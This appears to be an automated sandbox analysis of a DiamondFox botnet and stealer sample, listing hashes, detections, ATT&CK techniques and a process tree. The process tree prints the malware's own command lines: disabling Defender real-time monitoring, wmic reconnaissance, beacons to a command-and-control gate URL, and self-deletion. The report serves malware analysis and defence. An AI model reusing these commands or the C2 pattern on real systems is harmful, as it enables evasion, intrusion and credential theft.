diamondfox | 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

Analysis

max time kernel
126s
max time network
168s
platform
windows7_x64
resource
win7v20210410
submitted
04/07/2021, 00:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

windef.exe
Size

203KB
MD5

a1e165e1926c0c83123c89fce6b1af56
SHA1

281246ba4b852a5f62e032424f7816f5a6b0406f
SHA256

2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA512

28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Score

10^/10

diamondfox botnet discovery spyware stealer

Malware Config

Signatures

DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
botnet stealer diamondfox

DiamondFox payload 13 IoCs

Detects DiamondFox payload in file/memory.

resource	yara_rule
behavioral1/files/0x00040000000130d1-60.dat	diamondfox
behavioral1/files/0x00040000000130d1-61.dat	diamondfox
behavioral1/files/0x00040000000130d1-63.dat	diamondfox
behavioral1/files/0x00040000000130d1-75.dat	diamondfox
behavioral1/files/0x00040000000130d1-74.dat	diamondfox
behavioral1/files/0x00040000000130d1-137.dat	diamondfox
behavioral1/files/0x00040000000130d1-142.dat	diamondfox
behavioral1/files/0x00040000000130d1-149.dat	diamondfox
behavioral1/files/0x00040000000130d1-154.dat	diamondfox
behavioral1/files/0x00040000000130d1-159.dat	diamondfox
behavioral1/files/0x00040000000130d1-162.dat	diamondfox
behavioral1/files/0x00040000000130d1-169.dat	diamondfox
behavioral1/files/0x00040000000130d1-177.dat	diamondfox

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/2016-152-0x0000000000400000-0x0000000000455000-memory.dmp	MailPassView
behavioral1/memory/2016-153-0x000000000044412E-mapping.dmp	MailPassView
behavioral1/memory/2016-156-0x0000000000400000-0x0000000000455000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/1636-136-0x00000000004466F4-mapping.dmp	WebBrowserPassView
behavioral1/memory/1636-135-0x0000000000400000-0x000000000047C000-memory.dmp	WebBrowserPassView
behavioral1/memory/1636-139-0x0000000000400000-0x000000000047C000-memory.dmp	WebBrowserPassView

Nirsoft 9 IoCs

resource	yara_rule
behavioral1/memory/1636-136-0x00000000004466F4-mapping.dmp	Nirsoft
behavioral1/memory/1636-135-0x0000000000400000-0x000000000047C000-memory.dmp	Nirsoft
behavioral1/memory/1636-139-0x0000000000400000-0x000000000047C000-memory.dmp	Nirsoft
behavioral1/memory/1684-147-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft
behavioral1/memory/1684-148-0x0000000000413E10-mapping.dmp	Nirsoft
behavioral1/memory/1684-151-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft
behavioral1/memory/2016-152-0x0000000000400000-0x0000000000455000-memory.dmp	Nirsoft
behavioral1/memory/2016-153-0x000000000044412E-mapping.dmp	Nirsoft
behavioral1/memory/2016-156-0x0000000000400000-0x0000000000455000-memory.dmp	Nirsoft

Downloads MZ/PE file

Executes dropped EXE 10 IoCs

pid	Process
1668	MicrosoftEdgeCPS.exe
1636	MicrosoftEdgeCPS.exe
1544	MicrosoftEdgeCPS.exe
1684	MicrosoftEdgeCPS.exe
2016	MicrosoftEdgeCPS.exe
824	MicrosoftEdgeCPS.exe
1052	MicrosoftEdgeCPS.exe
1664	MicrosoftEdgeCPS.exe
1220	MicrosoftEdgeCPS.exe
1704	localmgr.exe

Deletes itself 1 IoCs

pid	Process
1640	powershell.exe

Loads dropped DLL 4 IoCs

pid	Process
1072	windef.exe
1072	windef.exe
1668	MicrosoftEdgeCPS.exe
1668	MicrosoftEdgeCPS.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 1668 set thread context of 1636	1668	MicrosoftEdgeCPS.exe	50
PID 1668 set thread context of 1544	1668	MicrosoftEdgeCPS.exe	51
PID 1668 set thread context of 1684	1668	MicrosoftEdgeCPS.exe	52
PID 1668 set thread context of 2016	1668	MicrosoftEdgeCPS.exe	53
PID 1668 set thread context of 824	1668	MicrosoftEdgeCPS.exe	54
PID 1668 set thread context of 1052	1668	MicrosoftEdgeCPS.exe	57
PID 1668 set thread context of 1664	1668	MicrosoftEdgeCPS.exe	58
PID 1668 set thread context of 1220	1668	MicrosoftEdgeCPS.exe	59

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 4 IoCs

evasion

pid	Process
2028	taskkill.exe
1212	taskkill.exe
1564	taskkill.exe
1980	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
644	notepad.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
284	powershell.exe
1640	powershell.exe
284	powershell.exe
1640	powershell.exe
1668	MicrosoftEdgeCPS.exe
1636	MicrosoftEdgeCPS.exe
1636	MicrosoftEdgeCPS.exe
1668	MicrosoftEdgeCPS.exe
1668	MicrosoftEdgeCPS.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1424	wmic.exe
Token: SeSecurityPrivilege	1424	wmic.exe
Token: SeTakeOwnershipPrivilege	1424	wmic.exe
Token: SeLoadDriverPrivilege	1424	wmic.exe
Token: SeSystemProfilePrivilege	1424	wmic.exe
Token: SeSystemtimePrivilege	1424	wmic.exe
Token: SeProfSingleProcessPrivilege	1424	wmic.exe
Token: SeIncBasePriorityPrivilege	1424	wmic.exe
Token: SeCreatePagefilePrivilege	1424	wmic.exe
Token: SeBackupPrivilege	1424	wmic.exe
Token: SeRestorePrivilege	1424	wmic.exe
Token: SeShutdownPrivilege	1424	wmic.exe
Token: SeDebugPrivilege	1424	wmic.exe
Token: SeSystemEnvironmentPrivilege	1424	wmic.exe
Token: SeRemoteShutdownPrivilege	1424	wmic.exe
Token: SeUndockPrivilege	1424	wmic.exe
Token: SeManageVolumePrivilege	1424	wmic.exe
Token: 33	1424	wmic.exe
Token: 34	1424	wmic.exe
Token: 35	1424	wmic.exe
Token: SeDebugPrivilege	284	powershell.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeIncreaseQuotaPrivilege	1424	wmic.exe
Token: SeSecurityPrivilege	1424	wmic.exe
Token: SeTakeOwnershipPrivilege	1424	wmic.exe
Token: SeLoadDriverPrivilege	1424	wmic.exe
Token: SeSystemProfilePrivilege	1424	wmic.exe
Token: SeSystemtimePrivilege	1424	wmic.exe
Token: SeProfSingleProcessPrivilege	1424	wmic.exe
Token: SeIncBasePriorityPrivilege	1424	wmic.exe
Token: SeCreatePagefilePrivilege	1424	wmic.exe
Token: SeBackupPrivilege	1424	wmic.exe
Token: SeRestorePrivilege	1424	wmic.exe
Token: SeShutdownPrivilege	1424	wmic.exe
Token: SeDebugPrivilege	1424	wmic.exe
Token: SeSystemEnvironmentPrivilege	1424	wmic.exe
Token: SeRemoteShutdownPrivilege	1424	wmic.exe
Token: SeUndockPrivilege	1424	wmic.exe
Token: SeManageVolumePrivilege	1424	wmic.exe
Token: 33	1424	wmic.exe
Token: 34	1424	wmic.exe
Token: 35	1424	wmic.exe
Token: SeIncreaseQuotaPrivilege	1112	wmic.exe
Token: SeSecurityPrivilege	1112	wmic.exe
Token: SeTakeOwnershipPrivilege	1112	wmic.exe
Token: SeLoadDriverPrivilege	1112	wmic.exe
Token: SeSystemProfilePrivilege	1112	wmic.exe
Token: SeSystemtimePrivilege	1112	wmic.exe
Token: SeProfSingleProcessPrivilege	1112	wmic.exe
Token: SeIncBasePriorityPrivilege	1112	wmic.exe
Token: SeCreatePagefilePrivilege	1112	wmic.exe
Token: SeBackupPrivilege	1112	wmic.exe
Token: SeRestorePrivilege	1112	wmic.exe
Token: SeShutdownPrivilege	1112	wmic.exe
Token: SeDebugPrivilege	1112	wmic.exe
Token: SeSystemEnvironmentPrivilege	1112	wmic.exe
Token: SeRemoteShutdownPrivilege	1112	wmic.exe
Token: SeUndockPrivilege	1112	wmic.exe
Token: SeManageVolumePrivilege	1112	wmic.exe
Token: 33	1112	wmic.exe
Token: 34	1112	wmic.exe
Token: 35	1112	wmic.exe
Token: SeIncreaseQuotaPrivilege	1112	wmic.exe
Token: SeSecurityPrivilege	1112	wmic.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1544	MicrosoftEdgeCPS.exe
1052	MicrosoftEdgeCPS.exe
1664	MicrosoftEdgeCPS.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1072 wrote to memory of 1668	1072	windef.exe	29
PID 1072 wrote to memory of 1668	1072	windef.exe	29
PID 1072 wrote to memory of 1668	1072	windef.exe	29
PID 1072 wrote to memory of 1668	1072	windef.exe	29
PID 1072 wrote to memory of 1640	1072	windef.exe	30
PID 1072 wrote to memory of 1640	1072	windef.exe	30
PID 1072 wrote to memory of 1640	1072	windef.exe	30
PID 1072 wrote to memory of 1640	1072	windef.exe	30
PID 1668 wrote to memory of 284	1668	MicrosoftEdgeCPS.exe	31
PID 1668 wrote to memory of 284	1668	MicrosoftEdgeCPS.exe	31
PID 1668 wrote to memory of 284	1668	MicrosoftEdgeCPS.exe	31
PID 1668 wrote to memory of 284	1668	MicrosoftEdgeCPS.exe	31
PID 1668 wrote to memory of 1424	1668	MicrosoftEdgeCPS.exe	35
PID 1668 wrote to memory of 1424	1668	MicrosoftEdgeCPS.exe	35
PID 1668 wrote to memory of 1424	1668	MicrosoftEdgeCPS.exe	35
PID 1668 wrote to memory of 1424	1668	MicrosoftEdgeCPS.exe	35
PID 1668 wrote to memory of 1112	1668	MicrosoftEdgeCPS.exe	37
PID 1668 wrote to memory of 1112	1668	MicrosoftEdgeCPS.exe	37
PID 1668 wrote to memory of 1112	1668	MicrosoftEdgeCPS.exe	37
PID 1668 wrote to memory of 1112	1668	MicrosoftEdgeCPS.exe	37
PID 1668 wrote to memory of 1684	1668	MicrosoftEdgeCPS.exe	40
PID 1668 wrote to memory of 1684	1668	MicrosoftEdgeCPS.exe	40
PID 1668 wrote to memory of 1684	1668	MicrosoftEdgeCPS.exe	40
PID 1668 wrote to memory of 1684	1668	MicrosoftEdgeCPS.exe	40
PID 1668 wrote to memory of 1072	1668	MicrosoftEdgeCPS.exe	42
PID 1668 wrote to memory of 1072	1668	MicrosoftEdgeCPS.exe	42
PID 1668 wrote to memory of 1072	1668	MicrosoftEdgeCPS.exe	42
PID 1668 wrote to memory of 1072	1668	MicrosoftEdgeCPS.exe	42
PID 1668 wrote to memory of 300	1668	MicrosoftEdgeCPS.exe	44
PID 1668 wrote to memory of 300	1668	MicrosoftEdgeCPS.exe	44
PID 1668 wrote to memory of 300	1668	MicrosoftEdgeCPS.exe	44
PID 1668 wrote to memory of 300	1668	MicrosoftEdgeCPS.exe	44
PID 1668 wrote to memory of 864	1668	MicrosoftEdgeCPS.exe	46
PID 1668 wrote to memory of 864	1668	MicrosoftEdgeCPS.exe	46
PID 1668 wrote to memory of 864	1668	MicrosoftEdgeCPS.exe	46
PID 1668 wrote to memory of 864	1668	MicrosoftEdgeCPS.exe	46
PID 1668 wrote to memory of 956	1668	MicrosoftEdgeCPS.exe	48
PID 1668 wrote to memory of 956	1668	MicrosoftEdgeCPS.exe	48
PID 1668 wrote to memory of 956	1668	MicrosoftEdgeCPS.exe	48
PID 1668 wrote to memory of 956	1668	MicrosoftEdgeCPS.exe	48
PID 1668 wrote to memory of 1636	1668	MicrosoftEdgeCPS.exe	50
PID 1668 wrote to memory of 1636	1668	MicrosoftEdgeCPS.exe	50
PID 1668 wrote to memory of 1636	1668	MicrosoftEdgeCPS.exe	50
PID 1668 wrote to memory of 1636	1668	MicrosoftEdgeCPS.exe	50
PID 1668 wrote to memory of 1636	1668	MicrosoftEdgeCPS.exe	50
PID 1668 wrote to memory of 1636	1668	MicrosoftEdgeCPS.exe	50
PID 1668 wrote to memory of 1636	1668	MicrosoftEdgeCPS.exe	50
PID 1668 wrote to memory of 1636	1668	MicrosoftEdgeCPS.exe	50
PID 1668 wrote to memory of 1636	1668	MicrosoftEdgeCPS.exe	50
PID 1668 wrote to memory of 1636	1668	MicrosoftEdgeCPS.exe	50
PID 1668 wrote to memory of 1544	1668	MicrosoftEdgeCPS.exe	51
PID 1668 wrote to memory of 1544	1668	MicrosoftEdgeCPS.exe	51
PID 1668 wrote to memory of 1544	1668	MicrosoftEdgeCPS.exe	51
PID 1668 wrote to memory of 1544	1668	MicrosoftEdgeCPS.exe	51
PID 1668 wrote to memory of 1544	1668	MicrosoftEdgeCPS.exe	51
PID 1668 wrote to memory of 1544	1668	MicrosoftEdgeCPS.exe	51
PID 1668 wrote to memory of 1544	1668	MicrosoftEdgeCPS.exe	51
PID 1668 wrote to memory of 1544	1668	MicrosoftEdgeCPS.exe	51
PID 1668 wrote to memory of 1684	1668	MicrosoftEdgeCPS.exe	52
PID 1668 wrote to memory of 1684	1668	MicrosoftEdgeCPS.exe	52
PID 1668 wrote to memory of 1684	1668	MicrosoftEdgeCPS.exe	52
PID 1668 wrote to memory of 1684	1668	MicrosoftEdgeCPS.exe	52
PID 1668 wrote to memory of 1684	1668	MicrosoftEdgeCPS.exe	52
PID 1668 wrote to memory of 1684	1668	MicrosoftEdgeCPS.exe	52

C:\Users\Admin\AppData\Local\Temp\windef.exe
"C:\Users\Admin\AppData\Local\Temp\windef.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1072
- C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
  "C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1668
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:284
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1424
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" os get caption /FORMAT:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1112
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_VideoController get caption /FORMAT:List
    3⤵
    PID:1684
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
    3⤵
    PID:1072
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
    3⤵
    PID:300
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
    3⤵
    PID:864
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
    3⤵
    PID:956
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Local\Temp\1.log"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1636
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Local\Temp\4.log"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1544
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Local\Temp\2.log"
    3⤵
    - Executes dropped EXE
    PID:1684
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Local\Temp\3.log"
    3⤵
    - Executes dropped EXE
    PID:2016
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
    3⤵
    - Executes dropped EXE
    PID:824
  - - C:\Windows\notepad.exe
      X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
      4⤵
      Opens file in notepad (likely ransom note)
      PID:644
  - - C:\Windows\write.exe
      X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
      4⤵
      PID:300
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1052
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1664
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
    3⤵
    - Executes dropped EXE
    PID:1220
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
    3⤵
    PID:768
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill" /PID 824 /F
    3⤵
    - Kills process with taskkill
    PID:1980
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill" /PID 1052 /F
    3⤵
    - Kills process with taskkill
    PID:2028
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill" /PID 1664 /F
    3⤵
    - Kills process with taskkill
    PID:1212
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill" /PID 1220 /F
    3⤵
    - Kills process with taskkill
    PID:1564
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
    3⤵
    PID:536
- - C:\Users\Admin\AppData\Local\Temp\localmgr.exe
    "C:\Users\Admin\AppData\Local\Temp\localmgr.exe"
    3⤵
    - Executes dropped EXE
    PID:1704
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\windef.exe' -Force -Recurse
  2⤵
  - Deletes itself
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1640

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/284-72-0x0000000004A10000-0x0000000004A11000-memory.dmp

Filesize
4KB

Download
memory/284-130-0x0000000006310000-0x0000000006311000-memory.dmp

Filesize
4KB

Download
memory/284-78-0x00000000049D0000-0x00000000049D1000-memory.dmp

Filesize
4KB

Download
memory/284-79-0x00000000049D2000-0x00000000049D3000-memory.dmp

Filesize
4KB

Download
memory/284-86-0x0000000004960000-0x0000000004961000-memory.dmp

Filesize
4KB

Download
memory/284-82-0x0000000002440000-0x0000000002441000-memory.dmp

Filesize
4KB

Download
memory/284-114-0x00000000055D0000-0x00000000055D1000-memory.dmp

Filesize
4KB

Download
memory/284-107-0x0000000006240000-0x0000000006241000-memory.dmp

Filesize
4KB

Download
memory/284-129-0x0000000006300000-0x0000000006301000-memory.dmp

Filesize
4KB

Download
memory/284-92-0x0000000005610000-0x0000000005611000-memory.dmp

Filesize
4KB

Download
memory/284-100-0x0000000005750000-0x0000000005751000-memory.dmp

Filesize
4KB

Download
memory/284-98-0x00000000056B0000-0x00000000056B1000-memory.dmp

Filesize
4KB

Download
memory/284-70-0x0000000002200000-0x0000000002201000-memory.dmp

Filesize
4KB

Download
memory/284-94-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/824-172-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/824-157-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/1052-173-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1052-160-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1072-59-0x00000000752F1000-0x00000000752F3000-memory.dmp

Filesize
8KB

Download
memory/1220-180-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1220-175-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/1544-140-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1544-145-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1636-135-0x0000000000400000-0x000000000047C000-memory.dmp

Filesize
496KB

Download
memory/1636-139-0x0000000000400000-0x000000000047C000-memory.dmp

Filesize
496KB

Download
memory/1640-80-0x0000000001EE0000-0x0000000002B2A000-memory.dmp

Filesize
12.3MB

Download
memory/1640-134-0x0000000005620000-0x0000000005621000-memory.dmp

Filesize
4KB

Download
memory/1640-146-0x0000000006130000-0x0000000006131000-memory.dmp

Filesize
4KB

Download
memory/1664-174-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/1664-167-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/1684-147-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1684-151-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1704-193-0x0000000004E75000-0x0000000004E86000-memory.dmp

Filesize
68KB

Download
memory/1704-192-0x0000000004E70000-0x0000000004E71000-memory.dmp

Filesize
4KB

Download
memory/2016-156-0x0000000000400000-0x0000000000455000-memory.dmp

Filesize
340KB

Download
memory/2016-152-0x0000000000400000-0x0000000000455000-memory.dmp

Filesize
340KB

Download